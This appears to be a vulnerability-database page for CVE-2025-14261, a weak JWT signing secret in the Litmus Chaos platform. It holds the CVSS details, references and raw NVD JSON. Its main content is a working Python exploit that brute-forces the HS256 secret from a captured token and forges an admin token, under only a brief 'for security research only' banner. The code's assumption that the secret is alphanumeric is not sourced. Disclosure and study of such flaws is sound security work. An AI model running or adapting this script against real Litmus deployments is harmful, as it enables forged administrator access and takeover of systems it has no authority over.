CVE-2025-14261

Description

The Litmus platform uses JWT for authentication and authorization, but the secret being used for signing the JWT is only 6 bytes long at its core, which makes it extremely easy to crack.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Litmus Chaos Platform < 3.15.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import jwt
import itertools
import string
from datetime import datetime, timedelta

# JWT token captured from the target
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Character set for brute force (6 bytes = alphanumeric)
charset = string.ascii_letters + string.digits

def crack_jwt_secret(token, max_length=6):
    """
    Brute force attack to crack weak JWT secret
    This PoC demonstrates the vulnerability due to insufficient entropy
    """
    for length in range(1, max_length + 1):
        for attempt in itertools.product(charset, repeat=length):
            secret = ''.join(attempt)
            try:
                decoded = jwt.decode(token, secret, algorithms=['HS256'])
                print(f"[+] Secret found: {secret}")
                print(f"[+] Decoded payload: {decoded}")
                return secret
            except jwt.InvalidSignatureError:
                continue
    return None

# Generate malicious token after cracking
def forge_token(secret, user_id="admin", role="admin"):
    """
    Forge a malicious JWT token using the cracked secret
    """
    payload = {
        "sub": user_id,
        "role": role,
        "exp": datetime.utcnow() + timedelta(hours=24),
        "iat": datetime.utcnow()
    }
    forged_token = jwt.encode(payload, secret, algorithm='HS256')
    return forged_token

# Usage example
secret = crack_jwt_secret(token)
if secret:
    malicious_token = forge_token(secret, user_id="admin", role="admin")
    print(f"Malicious token: {malicious_token}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14261
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14261
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14261/
[4] VulDB https://vuldb.com/cve/CVE-2025-14261
[5] https://github.com/litmuschaos/litmus/pull/5324
[6] https://research.jfrog.com/vulnerabilities/litmus-jwt-missing-entropy-elevation-jfsa-2025-001648159/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14261", "sourceIdentifier": "[email protected]", "published": "2025-12-08T19:15:48.197", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Litmus platform uses JWT for authentication and authorization, but the secret being used for signing the JWT is only 6 bytes long at its core, which makes it extremely easy to crack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-331"}]}], "references": [{"url": "https://github.com/litmuschaos/litmus/pull/5324", "source": "[email protected]"}, {"url": "https://research.jfrog.com/vulnerabilities/litmus-jwt-missing-entropy-elevation-jfsa-2025-001648159/", "source": "[email protected]"}]}}